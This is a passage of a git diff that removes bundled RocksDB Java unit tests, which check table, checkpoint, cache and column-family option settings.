-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Test
-  public void noBlockCache() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setNoBlockCache(true);
-    assertThat(blockBasedTableConfig.noBlockCache()).isTrue();
-  }
-
-  @Test
-  public void blockCacheSize() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setBlockCacheSize(8 * 1024);
-    assertThat(blockBasedTableConfig.blockCacheSize()).
-        isEqualTo(8 * 1024);
-  }
-
-  @Test
-  public void blockSizeDeviation() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setBlockSizeDeviation(12);
-    assertThat(blockBasedTableConfig.blockSizeDeviation()).
-        isEqualTo(12);
-  }
-
-  @Test
-  public void blockRestartInterval() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setBlockRestartInterval(15);
-    assertThat(blockBasedTableConfig.blockRestartInterval()).
-        isEqualTo(15);
-  }
-
-  @Test
-  public void wholeKeyFiltering() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setWholeKeyFiltering(false);
-    assertThat(blockBasedTableConfig.wholeKeyFiltering()).
-        isFalse();
-  }
-
-  @Test
-  public void cacheIndexAndFilterBlocks() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setCacheIndexAndFilterBlocks(true);
-    assertThat(blockBasedTableConfig.cacheIndexAndFilterBlocks()).
-        isTrue();
-
-  }
-
-  @Test
-  public void hashIndexAllowCollision() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setHashIndexAllowCollision(false);
-    assertThat(blockBasedTableConfig.hashIndexAllowCollision()).
-        isFalse();
-  }
-
-  @Test
-  public void blockCacheCompressedSize() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setBlockCacheCompressedSize(40);
-    assertThat(blockBasedTableConfig.blockCacheCompressedSize()).
-        isEqualTo(40);
-  }
-
-  @Test
-  public void checksumType() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    assertThat(ChecksumType.values().length).isEqualTo(3);
-    assertThat(ChecksumType.valueOf("kxxHash")).
-        isEqualTo(ChecksumType.kxxHash);
-    blockBasedTableConfig.setChecksumType(ChecksumType.kNoChecksum);
-    blockBasedTableConfig.setChecksumType(ChecksumType.kxxHash);
-    assertThat(blockBasedTableConfig.checksumType().equals(
-        ChecksumType.kxxHash));
-  }
-
-  @Test
-  public void indexType() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    assertThat(IndexType.values().length).isEqualTo(3);
-    blockBasedTableConfig.setIndexType(IndexType.kHashSearch);
-    assertThat(blockBasedTableConfig.indexType().equals(
-        IndexType.kHashSearch));
-    assertThat(IndexType.valueOf("kBinarySearch")).isNotNull();
-    blockBasedTableConfig.setIndexType(IndexType.valueOf("kBinarySearch"));
-    assertThat(blockBasedTableConfig.indexType().equals(
-        IndexType.kBinarySearch));
-  }
-
-  @Test
-  public void blockCacheCompressedNumShardBits() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setBlockCacheCompressedNumShardBits(4);
-    assertThat(blockBasedTableConfig.blockCacheCompressedNumShardBits()).
-        isEqualTo(4);
-  }
-
-  @Test
-  public void cacheNumShardBits() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setCacheNumShardBits(5);
-    assertThat(blockBasedTableConfig.cacheNumShardBits()).
-        isEqualTo(5);
-  }
-
-  @Test
-  public void blockSize() {
-    BlockBasedTableConfig blockBasedTableConfig = new BlockBasedTableConfig();
-    blockBasedTableConfig.setBlockSize(10);
-    assertThat(blockBasedTableConfig.blockSize()).isEqualTo(10);
-  }
-
-
-  @Test
-  public void blockBasedTableWithFilter() {
-    try(final Options options = new Options()
-        .setTableFormatConfig(new BlockBasedTableConfig()
-        .setFilter(new BloomFilter(10)))) {
-      assertThat(options.tableFactoryName()).
-          isEqualTo("BlockBasedTable");
-    }
-  }
-
-  @Test
-  public void blockBasedTableWithoutFilter() {
-    try(final Options options = new Options().setTableFormatConfig(
-        new BlockBasedTableConfig().setFilter(null))) {
-      assertThat(options.tableFactoryName()).
-          isEqualTo("BlockBasedTable");
-    }
-  }
-
-  @Test
-  public void blockBasedTableFormatVersion() {
-    BlockBasedTableConfig config = new BlockBasedTableConfig();
-    for (int version=0; version<=2; version++) {
-      config.setFormatVersion(version);
-      assertThat(config.formatVersion()).isEqualTo(version);
-    }
-  }
-
-  @Test(expected = AssertionError.class)
-  public void blockBasedTableFormatVersionFailNegative() {
-    BlockBasedTableConfig config = new BlockBasedTableConfig();
-    config.setFormatVersion(-1);
-  }
-
-  @Test(expected = AssertionError.class)
-  public void blockBasedTableFormatVersionFailIllegalVersion() {
-    BlockBasedTableConfig config = new BlockBasedTableConfig();
-    config.setFormatVersion(3);
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CheckPointTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CheckPointTest.java
deleted file mode 100644
index e79569f..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/CheckPointTest.java
+++ /dev/null
@@ -1,82 +0,0 @@
-package org.rocksdb;
-
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class CheckPointTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Rule
-  public TemporaryFolder checkpointFolder = new TemporaryFolder();
-
-  @Test
-  public void checkPoint() throws RocksDBException {
-    try (final Options options = new Options().
-        setCreateIfMissing(true)) {
-
-      try (final RocksDB db = RocksDB.open(options,
-          dbFolder.getRoot().getAbsolutePath())) {
-        db.put("key".getBytes(), "value".getBytes());
-        try (final Checkpoint checkpoint = Checkpoint.create(db)) {
-          checkpoint.createCheckpoint(checkpointFolder.
-              getRoot().getAbsolutePath() + "/snapshot1");
-          db.put("key2".getBytes(), "value2".getBytes());
-          checkpoint.createCheckpoint(checkpointFolder.
-              getRoot().getAbsolutePath() + "/snapshot2");
-        }
-      }
-
-      try (final RocksDB db = RocksDB.open(options,
-          checkpointFolder.getRoot().getAbsolutePath() +
-              "/snapshot1")) {
-        assertThat(new String(db.get("key".getBytes()))).
-            isEqualTo("value");
-        assertThat(db.get("key2".getBytes())).isNull();
-      }
-
-      try (final RocksDB db = RocksDB.open(options,
-          checkpointFolder.getRoot().getAbsolutePath() +
-              "/snapshot2")) {
-        assertThat(new String(db.get("key".getBytes()))).
-            isEqualTo("value");
-        assertThat(new String(db.get("key2".getBytes()))).
-            isEqualTo("value2");
-      }
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void failIfDbIsNull() {
-    try (final Checkpoint checkpoint = Checkpoint.create(null)) {
-
-    }
-  }
-
-  @Test(expected = IllegalStateException.class)
-  public void failIfDbNotInitialized() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(
-        dbFolder.getRoot().getAbsolutePath())) {
-      db.close();
-      Checkpoint.create(db);
-    }
-  }
-
-  @Test(expected = RocksDBException.class)
-  public void failWithIllegalPath() throws RocksDBException {
-    try (final RocksDB db = RocksDB.open(dbFolder.getRoot().getAbsolutePath());
-         final Checkpoint checkpoint = Checkpoint.create(db)) {
-      checkpoint.createCheckpoint("/Z:///:\\C:\\TZ/-");
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ClockCacheTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ClockCacheTest.java
deleted file mode 100644
index d1241ac..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ClockCacheTest.java
+++ /dev/null
@@ -1,26 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.Test;
-
-public class ClockCacheTest {
-
-  static {
-    RocksDB.loadLibrary();
-  }
-
-  @Test
-  public void newClockCache() {
-    final long capacity = 1000;
-    final int numShardBits = 16;
-    final boolean strictCapacityLimit = true;
-    try(final Cache clockCache = new ClockCache(capacity,
-        numShardBits, strictCapacityLimit)) {
-      //no op
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ColumnFamilyOptionsTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ColumnFamilyOptionsTest.java
deleted file mode 100644
index 7574943..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ColumnFamilyOptionsTest.java
+++ /dev/null
@@ -1,567 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import org.junit.ClassRule;
-import org.junit.Test;
-
-import java.util.ArrayList;
-import java.util.List;
-import java.util.Properties;
-import java.util.Random;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class ColumnFamilyOptionsTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  public static final Random rand = PlatformRandomHelper.
-      getPlatformSpecificRandomFactory();
-
-  @Test
-  public void getColumnFamilyOptionsFromProps() {
-    Properties properties = new Properties();
-    properties.put("write_buffer_size", "112");
-    properties.put("max_write_buffer_number", "13");
-
-    try (final ColumnFamilyOptions opt = ColumnFamilyOptions.
-        getColumnFamilyOptionsFromProps(properties)) {
-      // setup sample properties
-      assertThat(opt).isNotNull();
-      assertThat(String.valueOf(opt.writeBufferSize())).
-          isEqualTo(properties.get("write_buffer_size"));
-      assertThat(String.valueOf(opt.maxWriteBufferNumber())).
-          isEqualTo(properties.get("max_write_buffer_number"));
-    }
-  }
-
-  @Test
-  public void failColumnFamilyOptionsFromPropsWithIllegalValue() {
-    // setup sample properties
-    final Properties properties = new Properties();
-    properties.put("tomato", "1024");
-    properties.put("burger", "2");
-
-    try (final ColumnFamilyOptions opt =
-             ColumnFamilyOptions.getColumnFamilyOptionsFromProps(properties)) {
-      assertThat(opt).isNull();
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void failColumnFamilyOptionsFromPropsWithNullValue() {
-    try (final ColumnFamilyOptions opt =
-             ColumnFamilyOptions.getColumnFamilyOptionsFromProps(null)) {
-    }
-  }
-
-  @Test(expected = IllegalArgumentException.class)
-  public void failColumnFamilyOptionsFromPropsWithEmptyProps() {
-    try (final ColumnFamilyOptions opt =
-             ColumnFamilyOptions.getColumnFamilyOptionsFromProps(
-                 new Properties())) {
-    }
-  }
-
-  @Test
-  public void writeBufferSize() throws RocksDBException {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setWriteBufferSize(longValue);
-      assertThat(opt.writeBufferSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void maxWriteBufferNumber() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setMaxWriteBufferNumber(intValue);
-      assertThat(opt.maxWriteBufferNumber()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void minWriteBufferNumberToMerge() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setMinWriteBufferNumberToMerge(intValue);
-      assertThat(opt.minWriteBufferNumberToMerge()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void numLevels() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setNumLevels(intValue);
-      assertThat(opt.numLevels()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void levelZeroFileNumCompactionTrigger() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setLevelZeroFileNumCompactionTrigger(intValue);
-      assertThat(opt.levelZeroFileNumCompactionTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void levelZeroSlowdownWritesTrigger() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setLevelZeroSlowdownWritesTrigger(intValue);
-      assertThat(opt.levelZeroSlowdownWritesTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void levelZeroStopWritesTrigger() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setLevelZeroStopWritesTrigger(intValue);
-      assertThat(opt.levelZeroStopWritesTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void targetFileSizeBase() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setTargetFileSizeBase(longValue);
-      assertThat(opt.targetFileSizeBase()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void targetFileSizeMultiplier() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setTargetFileSizeMultiplier(intValue);
-      assertThat(opt.targetFileSizeMultiplier()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxBytesForLevelBase() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxBytesForLevelBase(longValue);
-      assertThat(opt.maxBytesForLevelBase()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void levelCompactionDynamicLevelBytes() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setLevelCompactionDynamicLevelBytes(boolValue);
-      assertThat(opt.levelCompactionDynamicLevelBytes())
-          .isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void maxBytesForLevelMultiplier() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final double doubleValue = rand.nextDouble();
-      opt.setMaxBytesForLevelMultiplier(doubleValue);
-      assertThat(opt.maxBytesForLevelMultiplier()).isEqualTo(doubleValue);
-    }
-  }
-
-  @Test
-  public void maxBytesForLevelMultiplierAdditional() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue1 = rand.nextInt();
-      final int intValue2 = rand.nextInt();
-      final int[] ints = new int[]{intValue1, intValue2};
-      opt.setMaxBytesForLevelMultiplierAdditional(ints);
-      assertThat(opt.maxBytesForLevelMultiplierAdditional()).isEqualTo(ints);
-    }
-  }
-
-  @Test
-  public void maxCompactionBytes() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxCompactionBytes(longValue);
-      assertThat(opt.maxCompactionBytes()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void softPendingCompactionBytesLimit() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setSoftPendingCompactionBytesLimit(longValue);
-      assertThat(opt.softPendingCompactionBytesLimit()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void hardPendingCompactionBytesLimit() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setHardPendingCompactionBytesLimit(longValue);
-      assertThat(opt.hardPendingCompactionBytesLimit()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void level0FileNumCompactionTrigger() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setLevel0FileNumCompactionTrigger(intValue);
-      assertThat(opt.level0FileNumCompactionTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void level0SlowdownWritesTrigger() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setLevel0SlowdownWritesTrigger(intValue);
-      assertThat(opt.level0SlowdownWritesTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void level0StopWritesTrigger() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setLevel0StopWritesTrigger(intValue);
-      assertThat(opt.level0StopWritesTrigger()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void arenaBlockSize() throws RocksDBException {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setArenaBlockSize(longValue);
-      assertThat(opt.arenaBlockSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void disableAutoCompactions() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setDisableAutoCompactions(boolValue);
-      assertThat(opt.disableAutoCompactions()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void maxSequentialSkipInIterations() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxSequentialSkipInIterations(longValue);
-      assertThat(opt.maxSequentialSkipInIterations()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void inplaceUpdateSupport() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final boolean boolValue = rand.nextBoolean();
-      opt.setInplaceUpdateSupport(boolValue);
-      assertThat(opt.inplaceUpdateSupport()).isEqualTo(boolValue);
-    }
-  }
-
-  @Test
-  public void inplaceUpdateNumLocks() throws RocksDBException {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setInplaceUpdateNumLocks(longValue);
-      assertThat(opt.inplaceUpdateNumLocks()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void memtablePrefixBloomSizeRatio() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final double doubleValue = rand.nextDouble();
-      opt.setMemtablePrefixBloomSizeRatio(doubleValue);
-      assertThat(opt.memtablePrefixBloomSizeRatio()).isEqualTo(doubleValue);
-    }
-  }
-
-  @Test
-  public void memtableHugePageSize() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setMemtableHugePageSize(longValue);
-      assertThat(opt.memtableHugePageSize()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void bloomLocality() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final int intValue = rand.nextInt();
-      opt.setBloomLocality(intValue);
-      assertThat(opt.bloomLocality()).isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void maxSuccessiveMerges() throws RocksDBException {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final long longValue = rand.nextLong();
-      opt.setMaxSuccessiveMerges(longValue);
-      assertThat(opt.maxSuccessiveMerges()).isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void optimizeFiltersForHits() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final boolean aBoolean = rand.nextBoolean();
-      opt.setOptimizeFiltersForHits(aBoolean);
-      assertThat(opt.optimizeFiltersForHits()).isEqualTo(aBoolean);
-    }
-  }
-
-  @Test
-  public void memTable() throws RocksDBException {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      opt.setMemTableConfig(new HashLinkedListMemTableConfig());
-      assertThat(opt.memTableFactoryName()).
-          isEqualTo("HashLinkedListRepFactory");
-    }
-  }
-
-  @Test
-  public void comparator() throws RocksDBException {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      opt.setComparator(BuiltinComparator.BYTEWISE_COMPARATOR);
-    }
-  }
-
-  @Test
-  public void linkageOfPrepMethods() {
-    try (final ColumnFamilyOptions options = new ColumnFamilyOptions()) {
-      options.optimizeUniversalStyleCompaction();
-      options.optimizeUniversalStyleCompaction(4000);
-      options.optimizeLevelStyleCompaction();
-      options.optimizeLevelStyleCompaction(3000);
-      options.optimizeForPointLookup(10);
-      options.optimizeForSmallDb();
-    }
-  }
-
-  @Test
-  public void shouldSetTestPrefixExtractor() {
-    try (final ColumnFamilyOptions options = new ColumnFamilyOptions()) {
-      options.useFixedLengthPrefixExtractor(100);
-      options.useFixedLengthPrefixExtractor(10);
-    }
-  }
-
-  @Test
-  public void shouldSetTestCappedPrefixExtractor() {
-    try (final ColumnFamilyOptions options = new ColumnFamilyOptions()) {
-      options.useCappedPrefixExtractor(100);
-      options.useCappedPrefixExtractor(10);
-    }
-  }
-
-  @Test
-  public void compressionTypes() {
-    try (final ColumnFamilyOptions columnFamilyOptions
-             = new ColumnFamilyOptions()) {
-      for (final CompressionType compressionType :
-          CompressionType.values()) {
-        columnFamilyOptions.setCompressionType(compressionType);
-        assertThat(columnFamilyOptions.compressionType()).
-            isEqualTo(compressionType);
-        assertThat(CompressionType.valueOf("NO_COMPRESSION")).
-            isEqualTo(CompressionType.NO_COMPRESSION);
-      }
-    }
-  }
-
-  @Test
-  public void compressionPerLevel() {
-    try (final ColumnFamilyOptions columnFamilyOptions
-             = new ColumnFamilyOptions()) {
-      assertThat(columnFamilyOptions.compressionPerLevel()).isEmpty();
-      List<CompressionType> compressionTypeList = new ArrayList<>();
-      for (int i = 0; i < columnFamilyOptions.numLevels(); i++) {
-        compressionTypeList.add(CompressionType.NO_COMPRESSION);
-      }
-      columnFamilyOptions.setCompressionPerLevel(compressionTypeList);
-      compressionTypeList = columnFamilyOptions.compressionPerLevel();
-      for (CompressionType compressionType : compressionTypeList) {
-        assertThat(compressionType).isEqualTo(
-            CompressionType.NO_COMPRESSION);
-      }
-    }
-  }
-
-  @Test
-  public void differentCompressionsPerLevel() {
-    try (final ColumnFamilyOptions columnFamilyOptions
-             = new ColumnFamilyOptions()) {
-      columnFamilyOptions.setNumLevels(3);
-
-      assertThat(columnFamilyOptions.compressionPerLevel()).isEmpty();
-      List<CompressionType> compressionTypeList = new ArrayList<>();
-
-      compressionTypeList.add(CompressionType.BZLIB2_COMPRESSION);
-      compressionTypeList.add(CompressionType.SNAPPY_COMPRESSION);
-      compressionTypeList.add(CompressionType.LZ4_COMPRESSION);
-
-      columnFamilyOptions.setCompressionPerLevel(compressionTypeList);
-      compressionTypeList = columnFamilyOptions.compressionPerLevel();
-
-      assertThat(compressionTypeList.size()).isEqualTo(3);
-      assertThat(compressionTypeList).
-          containsExactly(
-              CompressionType.BZLIB2_COMPRESSION,
-              CompressionType.SNAPPY_COMPRESSION,
-              CompressionType.LZ4_COMPRESSION);
-
-    }
-  }
-
-  @Test
-  public void bottommostCompressionType() {
-    try (final ColumnFamilyOptions columnFamilyOptions
-             = new ColumnFamilyOptions()) {
-      assertThat(columnFamilyOptions.bottommostCompressionType())
-          .isEqualTo(CompressionType.DISABLE_COMPRESSION_OPTION);
-
-      for (final CompressionType compressionType : CompressionType.values()) {
-        columnFamilyOptions.setBottommostCompressionType(compressionType);
-        assertThat(columnFamilyOptions.bottommostCompressionType())
-            .isEqualTo(compressionType);
-      }
-    }
-  }
-
-  @Test
-  public void compressionOptions() {
-    try (final ColumnFamilyOptions columnFamilyOptions
-             = new ColumnFamilyOptions();
-        final CompressionOptions compressionOptions = new CompressionOptions()
-          .setMaxDictBytes(123)) {
-
-      columnFamilyOptions.setCompressionOptions(compressionOptions);
-      assertThat(columnFamilyOptions.compressionOptions())
-          .isEqualTo(compressionOptions);
-      assertThat(columnFamilyOptions.compressionOptions().maxDictBytes())
-          .isEqualTo(123);
-    }
-  }
-
-  @Test
-  public void compactionStyles() {
-    try (final ColumnFamilyOptions columnFamilyOptions
-             = new ColumnFamilyOptions()) {
-      for (final CompactionStyle compactionStyle :
-          CompactionStyle.values()) {
-        columnFamilyOptions.setCompactionStyle(compactionStyle);
-        assertThat(columnFamilyOptions.compactionStyle()).
-            isEqualTo(compactionStyle);
-        assertThat(CompactionStyle.valueOf("FIFO")).
-            isEqualTo(CompactionStyle.FIFO);
-      }
-    }
-  }
-
-  @Test
-  public void maxTableFilesSizeFIFO() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      long longValue = rand.nextLong();
-      // Size has to be positive
-      longValue = (longValue < 0) ? -longValue : longValue;
-      longValue = (longValue == 0) ? longValue + 1 : longValue;
-      opt.setMaxTableFilesSizeFIFO(longValue);
-      assertThat(opt.maxTableFilesSizeFIFO()).
-          isEqualTo(longValue);
-    }
-  }
-
-  @Test
-  public void maxWriteBufferNumberToMaintain() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      int intValue = rand.nextInt();
-      // Size has to be positive
-      intValue = (intValue < 0) ? -intValue : intValue;
-      intValue = (intValue == 0) ? intValue + 1 : intValue;
-      opt.setMaxWriteBufferNumberToMaintain(intValue);
-      assertThat(opt.maxWriteBufferNumberToMaintain()).
-          isEqualTo(intValue);
-    }
-  }
-
-  @Test
-  public void compactionPriorities() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      for (final CompactionPriority compactionPriority :
-          CompactionPriority.values()) {
-        opt.setCompactionPriority(compactionPriority);
-        assertThat(opt.compactionPriority()).
-            isEqualTo(compactionPriority);
-      }
-    }
-  }
-
-  @Test
-  public void reportBgIoStats() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final boolean booleanValue = true;
-      opt.setReportBgIoStats(booleanValue);
-      assertThat(opt.reportBgIoStats()).
-          isEqualTo(booleanValue);
-    }
-  }
-
-  @Test
-  public void compactionOptionsUniversal() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions();
-        final CompactionOptionsUniversal optUni = new CompactionOptionsUniversal()
-          .setCompressionSizePercent(7)) {
-      opt.setCompactionOptionsUniversal(optUni);
-      assertThat(opt.compactionOptionsUniversal()).
-          isEqualTo(optUni);
-      assertThat(opt.compactionOptionsUniversal().compressionSizePercent())
-          .isEqualTo(7);
-    }
-  }
-
-  @Test
-  public void compactionOptionsFIFO() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions();
-         final CompactionOptionsFIFO optFifo = new CompactionOptionsFIFO()
-             .setMaxTableFilesSize(2000)) {
-      opt.setCompactionOptionsFIFO(optFifo);
-      assertThat(opt.compactionOptionsFIFO()).
-          isEqualTo(optFifo);
-      assertThat(opt.compactionOptionsFIFO().maxTableFilesSize())
-          .isEqualTo(2000);
-    }
-  }
-
-  @Test
-  public void forceConsistencyChecks() {
-    try (final ColumnFamilyOptions opt = new ColumnFamilyOptions()) {
-      final boolean booleanValue = true;
-      opt.setForceConsistencyChecks(booleanValue);
-      assertThat(opt.forceConsistencyChecks()).
-          isEqualTo(booleanValue);
-    }
-  }
-}
diff --git a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ColumnFamilyTest.java b/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ColumnFamilyTest.java
deleted file mode 100644
index 19fe332..0000000
--- a/thirdparty/rocksdb/java/src/test/java/org/rocksdb/ColumnFamilyTest.java
+++ /dev/null
@@ -1,606 +0,0 @@
-// Copyright (c) 2011-present, Facebook, Inc.  All rights reserved.
-//  This source code is licensed under both the GPLv2 (found in the
-//  COPYING file in the root directory) and Apache 2.0 License
-//  (found in the LICENSE.Apache file in the root directory).
-
-package org.rocksdb;
-
-import java.util.*;
-
-import org.junit.ClassRule;
-import org.junit.Rule;
-import org.junit.Test;
-import org.junit.rules.TemporaryFolder;
-
-import static org.assertj.core.api.Assertions.assertThat;
-
-public class ColumnFamilyTest {
-
-  @ClassRule
-  public static final RocksMemoryResource rocksMemoryResource =
-      new RocksMemoryResource();
-
-  @Rule
-  public TemporaryFolder dbFolder = new TemporaryFolder();
-
-  @Test
-  public void listColumnFamilies() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      // Test listColumnFamilies
-      final List<byte[]> columnFamilyNames = RocksDB.listColumnFamilies(options,
-          dbFolder.getRoot().getAbsolutePath());
-      assertThat(columnFamilyNames).isNotNull();
-      assertThat(columnFamilyNames.size()).isGreaterThan(0);
-      assertThat(columnFamilyNames.size()).isEqualTo(1);
-      assertThat(new String(columnFamilyNames.get(0))).isEqualTo("default");
-    }
-  }
-
-  @Test
-  public void defaultColumnFamily() throws RocksDBException {
-    try (final Options options = new Options().setCreateIfMissing(true);
-         final RocksDB db = RocksDB.open(options,
-             dbFolder.getRoot().getAbsolutePath())) {
-      final ColumnFamilyHandle cfh = db.getDefaultColumnFamily();
-      try {
-        assertThat(cfh).isNotNull();
-
-        final byte[] key = "key".getBytes();
-        final byte[] value = "value".getBytes();
-
-        db.put(cfh, key, value);
-
-        final byte[] actualValue = db.get(cfh, key);
-
-        assertThat(cfh).isNotNull();
-        assertThat(actualValue).isEqualTo(value);
-      } finally {
-        cfh.close();
-      }
-    }
